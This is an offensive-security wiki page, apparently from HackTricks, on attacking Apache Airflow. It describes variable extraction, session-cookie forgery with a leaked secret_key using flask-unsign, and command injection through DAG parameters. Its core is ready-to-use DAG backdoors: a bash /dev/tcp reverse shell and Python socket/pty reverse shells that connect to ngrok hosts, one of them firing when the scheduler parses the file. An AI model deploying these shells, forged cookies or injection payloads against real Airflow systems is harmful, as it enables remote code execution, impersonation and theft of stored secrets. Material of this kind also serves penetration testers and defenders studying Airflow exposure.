Apache Airflow Security
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Apache Airflow is a platform for orchestrating and scheduling data pipelines or workflows. In the context of data pipelines, "orchestration" means arranging, coordinating, and managing complex data workflows that originate from various sources. The main purpose of these orchestrated pipelines is to deliver processed, consumable data sets. These data sets are used by many applications, including business intelligence tools and data science and machine learning models, all of which underpin big data applications.
Basically, Apache Airflow will allow you to schedule the execution of code when something (event, cron) happens.
Local Lab
Docker-Compose
You can use the docker-compose config file from https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml to launch a complete Apache Airflow Docker environment. (If you are on macOS, make sure to give at least 6GB of RAM to the Docker VM.)
Minikube
An easy way to run Apache Airflow is with minikube:
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
helm install airflow-release airflow-stable/airflow
# Some information about how to access the web console will appear after this command
# Use this command to delete it
helm delete airflow-release
Airflow Configuration
Airflow might store sensitive information in its configuration or you can find weak configurations in place:
Airflow RBAC
Before you start attacking Airflow, you should understand how permissions work:
Attacks
Web Console Enumeration
If you have access to the web console, you might be able to access some or all of the following information:
- Variables (Custom sensitive information might be stored here)
- Connections (Custom sensitive information might be stored here)
  - Access them in http://<airflow>/connection/list/
- Configuration (Sensitive information like the secret_key and passwords might be stored here)
- List users & roles
- Code of each DAG (which might contain interesting info)
Retrieve Variables Values
Variables can be stored in Airflow so that DAGs can access their values. They are similar to secrets on other platforms. If you have enough permissions, you can access them in the GUI at http://<airflow>/variable/list/.
By default, Airflow shows the value of each variable in the GUI. However, it is possible to set a list of variables whose values appear as asterisks in the GUI.
These hidden values can still be retrieved via the CLI (which requires DB access), via arbitrary DAG execution, via the API's variables endpoint (the API needs to be activated), and even via the GUI itself!
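The API route can be sketched as follows. This is a minimal example under several assumptions: the instance runs Airflow 2.x with the stable REST API reachable under /api/v1, basic authentication is enabled as an API auth backend, and the host, key name, and credentials shown are hypothetical placeholders. Whether the value comes back in clear text may depend on the Airflow version and its masking settings.

```python
import base64
import json
import urllib.parse
import urllib.request


def build_variable_request(base_url, key, username, password):
    """Build (but do not send) a GET request for a single Airflow variable.

    Assumes the Airflow 2.x stable REST API path /api/v1/variables/<key>
    and HTTP basic authentication.
    """
    quoted_key = urllib.parse.quote(key, safe="")
    url = f"{base_url.rstrip('/')}/api/v1/variables/{quoted_key}"
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})


def fetch_variable(base_url, key, username, password):
    """Send the request and return the decoded JSON response."""
    req = build_variable_request(base_url, key, username, password)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)
```

For example, `fetch_variable("http://<airflow>", "some_variable", "user", "password")` would query one variable by name; all four arguments are placeholders to adapt to the target.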
To access those values from the GUI, just select the variables you want to access and click on Actions -> Export.
Another way is to brute-force the hidden value with the search filter, refining the search term until you recover the full value.
Privilege Escalation
If the expose_config configuration is set to True, any user with the role User or higher can read the configuration in the web console. This configuration includes the secret_key, which means that any user who obtains a valid key can create their own signed cookie to impersonate any other user account.
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
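Before forging a cookie, it can help to confirm what the exposed configuration actually contains. The following is a minimal sketch that assumes the configuration text has been copied out in airflow.cfg (INI) format and that, as in Airflow 2.x, both settings live in the [webserver] section. The function name and sample values are hypothetical.

```python
import configparser


def audit_webserver_config(cfg_text):
    """Extract expose_config and secret_key from airflow.cfg-style text.

    Assumption: both options are in the [webserver] section (Airflow 2.x layout).
    """
    # Interpolation is disabled because airflow.cfg values may contain '%'.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(cfg_text)
    section = parser["webserver"] if parser.has_section("webserver") else {}
    return {
        "expose_config": section.get("expose_config", "false").strip().lower(),
        "secret_key": section.get("secret_key"),
    }


sample = """
[webserver]
expose_config = True
secret_key = example-secret-key
"""
result = audit_webserver_config(sample)
print(result["expose_config"], result["secret_key"])
```

If a secret_key is recovered, it is the value to pass to the --secret option of the command above.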
DAG Backdoor (RCE in Airflow worker)
If you have write access to the place where the DAGs are saved, you can just create one that will send you a reverse shell.
Note that this reverse shell is going to be executed inside an airflow worker container:
# Reverse shell via BashOperator
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG(
    dag_id='rev_shell_bash',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = BashOperator(
        task_id='run',
        bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
    )
# Reverse shell via PythonOperator
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator

def rs(rhost, port):
    s = socket.socket()
    s.connect((rhost, port))
    # Redirect stdin, stdout and stderr to the socket
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    pty.spawn("/bin/sh")

with DAG(
    dag_id='rev_shell_python',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python',
        python_callable=rs,
        op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
    )
DAG Backdoor (RCE in Airflow scheduler)
Code placed at the top level of a DAG file (outside any task) is executed by the scheduler when it parses the file. At the time of writing, this happens a few seconds after the file is placed inside the DAGs folder.
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator

def rs(rhost, port):
    s = socket.socket()
    s.connect((rhost, port))
    # Redirect stdin, stdout and stderr to the socket
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    pty.spawn("/bin/sh")

# Top-level call: runs when the scheduler parses this file
rs("2.tcp.ngrok.io", 14403)

with DAG(
    dag_id='rev_shell_python2',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python2',
        python_callable=rs,
        op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 14403}
    )
DAG Creation
If you manage to compromise a machine inside the DAG cluster, you can create new DAG scripts in the dags/ folder and they will be replicated to the rest of the machines inside the DAG cluster.
DAG Code Injection
When you execute a DAG from the GUI you can pass arguments to it.
Therefore, if the DAG is not properly coded it could be vulnerable to Command Injection.
That is what happened in this CVE: https://www.exploit-db.com/exploits/49927
All you need to know to start looking for command injections in DAGs is that parameters are accessed with the code dag_run.conf.get("param_name").
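To illustrate why this matters, here is a minimal sketch of the vulnerable pattern without any Airflow dependency. It assumes a hypothetical DAG that builds a shell command by concatenating a parameter read from the run configuration; the function names, the "target" parameter, and the ping command are illustrative and are not taken from the CVE above.

```python
import shlex


def render_bash_command_unsafe(conf):
    # Mirrors a DAG doing dag_run.conf.get("target") and pasting it into a shell string
    target = conf.get("target", "localhost")
    return f"ping -c 1 {target}"


def render_bash_command_quoted(conf):
    # Same command, but the parameter is shell-quoted before interpolation
    target = conf.get("target", "localhost")
    return f"ping -c 1 {shlex.quote(target)}"


payload = {"target": "127.0.0.1; id"}
print(render_bash_command_unsafe(payload))  # ping -c 1 127.0.0.1; id
print(render_bash_command_quoted(payload))  # ping -c 1 '127.0.0.1; id'
```

In the unsafe variant the shell would run `id` as a second command, while in the quoted variant the whole payload stays a single argument. When reviewing DAG code, the first shape is the one to look for.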
Moreover, the same vulnerability might occur with variables (note that with enough privileges you could control the value of the variables in the GUI). Variables are accessed with:
from airflow.models import Variable
[...]
foo = Variable.get("foo")
If they are used, for example, inside a bash command, you could perform a command injection.
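When you can read DAG source code, a quick way to find candidate injection points is to search for the two access patterns mentioned in this section. The following is a rough sketch, not a complete static analysis: it only flags lines that mention dag_run.conf or Variable.get( and leaves it to you to check whether the value reaches a shell command. The helper name and the sample source are hypothetical.

```python
import re

# Access patterns described in this section
SOURCES = {
    "dag_run.conf": re.compile(r"dag_run\.conf\b"),
    "Variable.get": re.compile(r"\bVariable\.get\s*\("),
}


def find_user_controlled_inputs(dag_source):
    """Return (line_number, label, line) for each line using a flagged pattern."""
    hits = []
    for lineno, line in enumerate(dag_source.splitlines(), start=1):
        for label, pattern in SOURCES.items():
            if pattern.search(line):
                hits.append((lineno, label, line.strip()))
    return hits


sample = '''from airflow.models import Variable
foo = Variable.get("foo")
cmd = "echo " + dag_run.conf.get("msg")
'''
for hit in find_user_controlled_inputs(sample):
    print(hit)
```

Each hit is only a starting point: the interesting cases are those where the flagged value ends up in a bash_command or a similar execution sink.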